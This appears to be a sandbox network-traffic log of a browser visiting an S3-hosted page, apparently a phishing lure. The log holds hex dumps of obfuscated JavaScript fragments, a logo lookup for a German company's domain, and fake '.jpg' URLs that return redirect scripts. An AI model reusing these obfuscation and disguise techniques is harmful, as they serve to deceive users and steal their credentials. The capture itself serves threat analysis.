                                    2025-01-23 07:05:32 UTC16384INData Raw: 5f 30 78 31 65 64 32 65 31 28 30 78 34 64 63 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 34 36 39 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 34 32 31 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 36 64 31 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 32 62 39 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 34 39 30 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 35 32 63 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 32 66 31 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 38 30 64 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 35 32 64 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 32 63 38 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 34 63 65 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 33 37 35 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 64 63 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 37 37 34 29 2b 5f
                                    Data Ascii: _0x1ed2e1(0x4dc)+_0x1ed2e1(0x469)+_0x1ed2e1(0x421)+_0x1ed2e1(0x6d1)+_0x1ed2e1(0x2b9)+_0x1ed2e1(0x490)+_0x1ed2e1(0x52c)+_0x1ed2e1(0x2f1)+_0x1ed2e1(0x80d)+_0x1ed2e1(0x52d)+_0x1ed2e1(0x2c8)+_0x1ed2e1(0x4ce)+_0x1ed2e1(0x375)+_0x1ed2e1(0xdc)+_0x1ed2e1(0x774)+_
                                    2025-01-23 07:05:32 UTC1024INData Raw: 31 65 64 32 65 31 28 30 78 34 37 31 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 38 31 63 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 32 37 39 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 37 31 35 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 33 32 33 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 31 65 39 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 32 38 39 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 35 65 65 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 32 37 39 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 31 39 61 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 35 31 62 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 36 62 36 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 31 64 63 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 62 65 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 37 66 37 29 2b 5f 30 78 31
                                    Data Ascii: 1ed2e1(0x471)+_0x1ed2e1(0x81c)+_0x1ed2e1(0x279)+_0x1ed2e1(0x715)+_0x1ed2e1(0x323)+_0x1ed2e1(0x1e9)+_0x1ed2e1(0x289)+_0x1ed2e1(0x5ee)+_0x1ed2e1(0x279)+_0x1ed2e1(0x19a)+_0x1ed2e1(0x51b)+_0x1ed2e1(0x6b6)+_0x1ed2e1(0x1dc)+_0x1ed2e1(0xbe)+_0x1ed2e1(0x7f7)+_0x1
                                    2025-01-23 07:05:32 UTC16384INData Raw: 30 78 34 35 34 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 36 30 65 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 36 65 31 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 33 35 37 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 36 65 61 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 31 34 34 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 32 66 36 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 36 62 39 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 37 35 64 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 32 31 33 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 64 39 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 36 33 31 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 36 65 35 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 36 39 61 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 33 62 35 29 2b 5f 30 78 31 65 64 32 65 31 28 30
                                    Data Ascii: 0x454)+_0x1ed2e1(0x60e)+_0x1ed2e1(0x6e1)+_0x1ed2e1(0x357)+_0x1ed2e1(0x6ea)+_0x1ed2e1(0x144)+_0x1ed2e1(0x2f6)+_0x1ed2e1(0x6b9)+_0x1ed2e1(0x75d)+_0x1ed2e1(0x213)+_0x1ed2e1(0xd9)+_0x1ed2e1(0x631)+_0x1ed2e1(0x6e5)+_0x1ed2e1(0x69a)+_0x1ed2e1(0x3b5)+_0x1ed2e1(0
                                    2025-01-23 07:05:32 UTC1024INData Raw: 38 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 34 35 34 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 34 32 39 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 63 38 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 33 31 63 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 36 32 35 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 33 61 37 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 35 39 63 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 36 62 38 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 37 62 65 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 31 36 64 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 37 66 30 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 33 61 30 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 34 61 30 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 37 34 31 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 36 39 35
                                    Data Ascii: 8)+_0x1ed2e1(0x454)+_0x1ed2e1(0x429)+_0x1ed2e1(0xc8)+_0x1ed2e1(0x31c)+_0x1ed2e1(0x625)+_0x1ed2e1(0x3a7)+_0x1ed2e1(0x59c)+_0x1ed2e1(0x6b8)+_0x1ed2e1(0x7be)+_0x1ed2e1(0x16d)+_0x1ed2e1(0x7f0)+_0x1ed2e1(0x3a0)+_0x1ed2e1(0x4a0)+_0x1ed2e1(0x741)+_0x1ed2e1(0x695
                                    2025-01-23 07:05:32 UTC1749INData Raw: 32 65 31 28 30 78 35 66 31 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 36 35 31 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 37 35 65 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 32 63 33 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 34 38 66 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 32 32 33 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 34 35 65 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 31 66 33 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 31 64 61 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 38 30 39 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 31 63 61 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 36 62 32 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 34 35 34 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 34 32 39 29 2b 5f 30 78 31 65 64 32 65 31 28 30 78 63 38 29 2b 5f 30 78 31 65 64 32
                                    Data Ascii: 2e1(0x5f1)+_0x1ed2e1(0x651)+_0x1ed2e1(0x75e)+_0x1ed2e1(0x2c3)+_0x1ed2e1(0x48f)+_0x1ed2e1(0x223)+_0x1ed2e1(0x45e)+_0x1ed2e1(0x1f3)+_0x1ed2e1(0x1da)+_0x1ed2e1(0x809)+_0x1ed2e1(0x1ca)+_0x1ed2e1(0x6b2)+_0x1ed2e1(0x454)+_0x1ed2e1(0x429)+_0x1ed2e1(0xc8)+_0x1ed2
                                    2025-01-23 07:05:32 UTC16384INData Raw: 27 2c 27 35 25 36 43 25 36 43 25 33 42 27 2c 27 25 37 30 25 36 31 25 36 34 25 27 2c 27 43 25 37 34 25 32 38 25 32 39 27 2c 27 36 39 25 36 34 25 37 34 25 36 27 2c 27 36 43 25 37 34 25 32 38 25 32 27 2c 27 33 30 25 33 32 25 33 34 25 33 27 2c 27 37 25 36 39 25 36 45 25 33 41 27 2c 27 41 25 32 30 25 36 33 25 36 35 27 2c 27 36 43 25 36 39 25 36 37 25 36 27 2c 27 31 25 36 39 25 36 43 25 34 34 27 2c 27 33 25 36 46 25 36 44 25 32 32 27 2c 27 32 25 32 30 25 36 39 25 36 33 27 2c 27 33 35 25 33 35 25 33 35 25 33 27 2c 27 32 46 25 33 42 25 30 41 25 32 27 2c 27 25 36 35 25 33 42 25 32 32 25 27 2c 27 33 42 25 30 41 25 32 30 25 32 27 2c 27 30 25 32 30 25 32 30 25 36 43 27 2c 27 37 42 25 30 41 25 30 41 25 32 27 2c 27 25 37 34 25 36 39 25 36 46 25 27 2c 27 32 43 25 32 30
                                    Data Ascii: ','5%6C%6C%3B','%70%61%64%','C%74%28%29','69%64%74%6','6C%74%28%2','30%32%34%3','7%69%6E%3A','A%20%63%65','6C%69%67%6','1%69%6C%44','3%6F%6D%22','2%20%69%63','35%35%35%3','2F%3B%0A%2','%65%3B%22%','3B%0A%20%2','0%20%20%6C','7B%0A%0A%2','%74%69%6F%','2C%20
                                    2025-01-23 07:05:32 UTC1024INData Raw: 25 27 2c 27 36 25 36 46 25 37 32 25 36 44 27 2c 27 25 37 34 25 34 32 25 37 39 25 27 2c 27 32 30 25 32 41 25 32 46 25 30 27 2c 27 25 36 39 25 36 36 25 33 42 25 27 2c 27 25 32 30 25 33 34 25 37 32 25 27 2c 27 32 46 25 37 33 25 36 44 25 36 27 2c 27 35 25 33 41 25 32 30 25 33 31 27 2c 27 25 36 34 25 32 44 25 36 33 25 27 2c 27 25 32 32 25 33 45 25 30 41 25 27 2c 27 25 36 33 25 36 43 25 36 31 25 27 2c 27 33 34 25 32 39 25 33 42 25 30 27 2c 27 34 25 33 32 25 33 42 25 30 41 27 2c 27 25 36 36 25 33 30 25 33 42 25 27 2c 27 46 25 36 45 25 33 44 25 32 32 27 2c 27 36 36 25 36 46 25 36 45 25 37 27 2c 27 25 37 32 25 36 34 25 36 35 25 27 2c 27 36 39 25 36 43 25 35 32 25 36 27 2c 27 31 25 36 45 25 36 45 25 36 35 27 2c 27 36 35 25 37 34 25 34 35 25 36 27 2c 27 31 25 32 44
                                    Data Ascii: %','6%6F%72%6D','%74%42%79%','20%2A%2F%0','%69%66%3B%','%20%34%72%','2F%73%6D%6','5%3A%20%31','%64%2D%63%','%22%3E%0A%','%63%6C%61%','34%29%3B%0','4%32%3B%0A','%66%30%3B%','F%6E%3D%22','66%6F%6E%7','%72%64%65%','69%6C%52%6','1%6E%6E%65','65%74%45%6','1%2D
                                    2025-01-23 07:05:32 UTC592INData Raw: 46 25 37 38 27 2c 27 43 25 36 43 25 36 35 25 36 34 27 2c 27 30 25 32 30 25 32 30 25 32 30 27 2c 27 30 25 36 37 25 32 32 25 32 30 27 2c 27 25 33 32 25 32 30 25 36 33 25 27 2c 27 36 45 25 32 44 25 36 43 25 36 27 2c 27 41 25 32 30 25 33 33 25 37 30 27 2c 27 36 39 25 37 32 25 36 35 25 32 27 2c 27 25 32 44 25 36 33 25 36 46 25 27 2c 27 46 25 36 43 25 36 39 25 36 34 27 2c 27 37 30 25 37 38 25 32 30 25 37 27 2c 27 25 32 43 25 32 30 25 33 38 25 27 2c 27 34 25 37 32 25 37 39 25 32 30 27 2c 27 25 36 32 25 36 31 25 36 33 25 27 2c 27 36 46 25 37 33 25 36 39 25 37 27 2c 27 25 36 32 25 32 38 25 33 34 25 27 2c 27 33 30 25 37 30 25 37 38 25 33 27 2c 27 35 34 25 32 32 25 32 43 25 32 27 2c 27 36 35 25 33 44 25 32 32 25 36 27 2c 27 25 36 37 25 36 45 25 32 30 25 27 2c 27 34
                                    Data Ascii: F%78','C%6C%65%64','0%20%20%20','0%67%22%20','%32%20%63%','6E%2D%6C%6','A%20%33%70','69%72%65%2','%2D%63%6F%','F%6C%69%64','70%78%20%7','%2C%20%38%','4%72%79%20','%62%61%63%','6F%73%69%7','%62%28%34%','30%70%78%3','54%22%2C%2','65%3D%22%6','%67%6E%20%','4


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.664898104.18.40.684433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-23 07:05:33 UTC689OUTGET /f6136e9b49.js HTTP/1.1
                                    Host: kit.fontawesome.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    Origin: https://exy77.s3.eu-central-1.amazonaws.com
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: script
                                    Referer: https://exy77.s3.eu-central-1.amazonaws.com/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-01-23 07:05:33 UTC469INHTTP/1.1 403 Forbidden
                                    Date: Thu, 23 Jan 2025 07:05:33 GMT
                                    Content-Length: 9
                                    Connection: close
                                    access-control-allow-headers: accept, accept-langauge, content-language, content-type, fa-kit-token
                                    access-control-allow-methods: GET, OPTIONS
                                    access-control-allow-origin: *
                                    access-control-max-age: 3000
                                    Cache-Control: max-age=0, private, must-revalidate
                                    x-request-id: GB1AfD0b3gv5LfswYMlh
                                    CF-Cache-Status: MISS
                                    Server: cloudflare
                                    CF-RAY: 9065efa0b9db4374-EWR
                                    2025-01-23 07:05:33 UTC9INData Raw: 46 6f 72 62 69 64 64 65 6e
                                    Data Ascii: Forbidden


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.66490276.223.67.1894433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-23 07:05:34 UTC629OUTGET /wp-includes/images/Docubg.jpg HTTP/1.1
                                    Host: electjimhenderson.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Referer: https://exy77.s3.eu-central-1.amazonaws.com/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-01-23 07:05:34 UTC121INHTTP/1.1 200 OK
                                    Content-Type: text/html
                                    Date: Thu, 23 Jan 2025 07:05:34 GMT
                                    Content-Length: 114
                                    Connection: close
                                    2025-01-23 07:05:34 UTC114INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4192.168.2.66489940.113.103.199443
                                    TimestampBytes transferredDirectionData
                                    2025-01-23 07:05:34 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4d 6d 33 67 58 61 30 55 30 55 2b 6f 65 69 4a 50 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 39 61 31 62 65 33 36 36 61 61 62 35 38 61 34 0d 0a 0d 0a
                                    Data Ascii: CNT 1 CON 305MS-CV: Mm3gXa0U0U+oeiJP.1Context: 69a1be366aab58a4
                                    2025-01-23 07:05:34 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                    2025-01-23 07:05:34 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4d 6d 33 67 58 61 30 55 30 55 2b 6f 65 69 4a 50 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 39 61 31 62 65 33 36 36 61 61 62 35 38 61 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 53 76 41 73 43 6f 6e 6a 51 46 55 32 55 57 36 38 33 33 6b 67 64 55 75 77 50 37 74 41 66 49 41 41 4b 4d 73 78 6d 63 49 58 57 69 64 7a 36 4a 39 34 64 6f 33 41 31 2f 67 65 67 6f 6b 34 5a 46 4c 65 37 42 36 35 62 4f 2b 7a 2f 61 36 74 43 37 55 59 53 6d 72 4f 4f 70 6a 42 37 61 43 77 4d 49 58 72 38 50 70 63 78 65 6b 65 51 2f 56 58
                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: Mm3gXa0U0U+oeiJP.2Context: 69a1be366aab58a4<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYSvAsConjQFU2UW6833kgdUuwP7tAfIAAKMsxmcIXWidz6J94do3A1/gegok4ZFLe7B65bO+z/a6tC7UYSmrOOpjB7aCwMIXr8PpcxekeQ/VX
                                    2025-01-23 07:05:34 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4d 6d 33 67 58 61 30 55 30 55 2b 6f 65 69 4a 50 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 39 61 31 62 65 33 36 36 61 61 62 35 38 61 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: Mm3gXa0U0U+oeiJP.3Context: 69a1be366aab58a4<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                    2025-01-23 07:05:34 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                    Data Ascii: 202 1 CON 58
                                    2025-01-23 07:05:34 UTC58INData Raw: 4d 53 2d 43 56 3a 20 32 45 4e 30 61 52 2b 78 76 30 75 73 7a 5a 4e 71 42 6f 42 32 61 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                    Data Ascii: MS-CV: 2EN0aR+xv0uszZNqBoB2aw.0Payload parsing failed.


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.66490776.223.67.1894433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-23 07:05:34 UTC629OUTGET /wp-includes/images/banner.jpg HTTP/1.1
                                    Host: electjimhenderson.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Referer: https://exy77.s3.eu-central-1.amazonaws.com/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-01-23 07:05:34 UTC121INHTTP/1.1 200 OK
                                    Content-Type: text/html
                                    Date: Thu, 23 Jan 2025 07:05:34 GMT
                                    Content-Length: 114
                                    Connection: close
                                    2025-01-23 07:05:34 UTC114INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.66491176.223.67.1894433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-23 07:05:35 UTC374OUTGET /wp-includes/images/Docubg.jpg HTTP/1.1
                                    Host: electjimhenderson.com
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-01-23 07:05:35 UTC121INHTTP/1.1 200 OK
                                    Content-Type: text/html
                                    Date: Thu, 23 Jan 2025 07:05:35 GMT
                                    Content-Length: 114
                                    Connection: close
                                    2025-01-23 07:05:35 UTC114INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    7192.168.2.66490813.32.27.1294433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-23 07:05:35 UTC606OUTGET /iprotex.de HTTP/1.1
                                    Host: logo.clearbit.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Referer: https://exy77.s3.eu-central-1.amazonaws.com/
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2025-01-23 07:05:35 UTC548INHTTP/1.1 200 OK
                                    Content-Type: image/png
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    Cache-Control: public, max-age=2592000
                                    Date: Thu, 23 Jan 2025 07:05:35 GMT
                                    x-envoy-response-flags: -
                                    Server: Clearbit
                                    strict-transport-security: max-age=63072000; includeSubDomains; preload
                                    x-content-type-options: nosniff
                                    X-Cache: Miss from cloudfront
                                    Via: 1.1 cbe141923b7469a299306144733821c2.cloudfront.net (CloudFront)
                                    X-Amz-Cf-Pop: FRA56-C2
                                    X-Amz-Cf-Id: 9HJWLRMNWtRfi2WfMeFzAVDq-kOoFc0TwtFE3caxXfDXMI-v2RxvtQ==
                                    2025-01-23 07:05:35 UTC15836INData Raw: 33 65 37 30 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 6a 3b 49 44 41 54 78 9c b4 bd 79 98 5d c7 75 1f 78 ce a9 aa 7b df d2 fb 8a c6 d2 d8 bb b1 03 24 b8 88 24 48 4a a4 14 4a b2 6c cb 4b 22 59 72 1c 2f 93 d8 91 c7 63 fb 8f cc e2 d8 11 e5 cc 97 4c c6 76 c6 99 cc 24 93 4c 2c 7f b6 3c b6 24 8f 6c 6d d6 62 8a e2 be 13 fb be 2f 0d 74 03 e8 6e f4 fa de bb f7 56 d5 39 f3 55 dd 06 44 52 82 2c 8e 98 c7 fe 88 06 fa f5 ed 7b ab ce f2 fb 9d 73 7e d5 5a 44 e0 ff ff 4b 00 38 7e a2 ca bf 08 00 c6 bf e3 d2 57 31 8f ef a0 f8 a1 45 10 41 3c a3 c2 f8 d5 f0 5d 1e c0 01 24 00 e8 66 01 8d c3 d4 91 36 02 b3 4e ce 5e 9e 18 9f 9a 19 9b 6e 9c 9b f4 93 4d 7d 69 1e a6 17 1a b3 85 9f b2 15 6b ad 00 b6 f3 dc 5f fc d2
                                    Data Ascii: 3e70PNGIHDRL\j;IDATxy]ux{$$HJJlK"Yr/cLv$L,<$lmb/tnV9UDR,{s~ZDK8~W1EA<]$f6N^nM}ik_
                                    2025-01-23 07:05:35 UTC156INData Raw: a9 b2 16 5f 96 e4 b1 3c 4e 45 24 07 fd 85 e7 4f 3f 75 78 62 56 f5 0b 78 08 26 29 16 b5 8d ca 4d 64 07 c1 08 21 09 40 85 14 70 5d 5a 7f ff d1 f5 8f 8e 0e 06 7a 16 eb b1 ba 74 6a 5f b6 a8 c0 08 17 90 3e 79 78 e2 d5 4b ad 4c f5 02 60 01 3a 2c 68 b8 72 52 04 ae 8b c4 19 fa 0c 0d 59 89 07 85 b1 bd 73 63 cf f6 75 3d 01 a1 8a 12 55 8d 8b e3 ca a3 07 c2 86 c5 56 52 0c 4f c1 9a 9b 9c 1e bc b2 f8 d4 fe 4b 4c 35 80 96 07 70 31 05 44 12 1e 72 46 34 79 fa b1 0d 1d 3f fe 0d 0a
